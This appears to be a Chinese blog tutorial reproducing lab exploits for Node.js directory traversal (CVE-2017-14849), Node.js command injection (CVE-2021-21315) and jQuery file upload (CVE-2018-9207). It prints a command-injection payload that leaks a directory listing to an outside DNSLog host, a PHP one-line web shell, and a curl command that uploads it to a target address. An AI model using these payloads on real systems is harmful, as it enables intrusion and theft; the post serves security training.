框架安全&CVE复现&Django&Flask&Node.JS&JQuery

javascript开发框架

靶场搭建可用蓝易云服务器

😘😘😘😘😘😘点击查看详情

Node

Node.js 目录穿越漏洞(CVE-2017-14849)

我们可以通过F12看到有很多文件加载了

那么目录穿越是什么呢

其实就是攻击者可以利用该漏洞读取运行应用程序的服务器上的任意文件

那么我们尝试加载

main.js文件

我们可以看到是无法读取到的

说明我们的路径还是不正确

那么如果真的要搞清楚这个路径需要用到工具去对路径进行拆解了

那么这个文件的真实路径是

/static/main.js

我们尝试下

可以看见是读取的到的

那么就证明了

如果你知道路径你就可以去穿越目录了

参考

(CVE-2017-14849)Node.js 目录穿越漏洞

node.js 命令执行 (CVE-2021-21315)

这个的话怎么搞呢

首先用到一个网站工具

DNSLog Platform

获取一个url

这时候套用模板就可以了

复制代码
/api/getServices?name[]=$(ping%20`ls%20/tmp`.qki7ut.dnslog.cn)

替换上面的url

复制代码
/api/getServices?name[]=$(ping%20`ls%20/tmp`.n9wgwv.dnslog.cn)

直接替换上

然后访问

这个时候我们回到那个工具网站

点击上面的那个按钮刷新几下就🆗了

jQuery

jQuery 文件上传漏洞(CVE-2018-9207)

主页面

然后写一个一句话木马

php 复制代码
<?php
    @eval($_POST['shell']);
    ?>

然后在当前目录下打开cmd

复制代码
curl -F "[email protected]" "http://123.58.236.76:19514/jquery-upload-file/php/upload.php"

执行这条命令

只需要改目标ip和端口还有就你的一句话木马文件就可以了

/jquery-upload-file/

相关推荐
白山云北诗22 分钟前
网络安全小知识课堂(六)
网络·安全·web安全
白山云北诗25 分钟前
网络安全小知识课堂(七)
安全·web安全
神经毒素30 分钟前
WEB安全--内网渗透--Kerberos之AS_REQ&AS_REP
安全·web安全·内网渗透·kerbreos
Gcanfly1 小时前
任务调度和安全如何结合
安全·联邦学习
秋说1 小时前
【区块链安全 | 第三十七篇】合约审计之获取私有数据(一)
安全·区块链
麻芝汤圆2 小时前
Linux操作系统的计算机体系结构与网络安全的深度关联
大数据·linux·运维·服务器·网络·安全·web安全
唐古乌梁海4 小时前
【Django】教程-12-柱状图
django
virelin_Y.lin4 小时前
系统与网络安全------网络通信原理(1)
安全·web安全·网络通信模型
秋说5 小时前
【区块链安全 | 第三十六篇】合约审计之自毁函数
安全·区块链
网络研究院5 小时前
2025 年 4 月补丁星期二预测:微软将推出更多 AI 安全功能
人工智能·安全·microsoft·漏洞·威胁·补丁